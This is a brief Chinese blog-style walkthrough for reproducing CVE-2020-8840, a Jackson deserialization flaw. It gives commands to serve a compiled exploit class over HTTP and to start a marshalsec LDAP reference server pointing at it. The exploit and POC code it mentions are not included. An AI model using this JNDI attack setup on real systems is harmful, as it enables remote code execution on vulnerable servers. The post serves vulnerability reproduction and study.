CVE-2020-8840复现

Windows环境下执行命令的将下面的代码编译成class放到服务器上

在class的同目录执行:

python -m http.server 8080

开启一个简陋的web服务。

然后执行:

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://localhost:8080/#Exploit

开启ldap服务。

执行POC:

大功告成

如代码所示,需要开启enableDefaultTyping方法才能成功,非默认配置。

踩坑:把exp代码放到package中会加载后执行不成功,独立出来就好了。

一个热爱域渗透/WAF绕过/免杀/代码审计/工具开发的憨批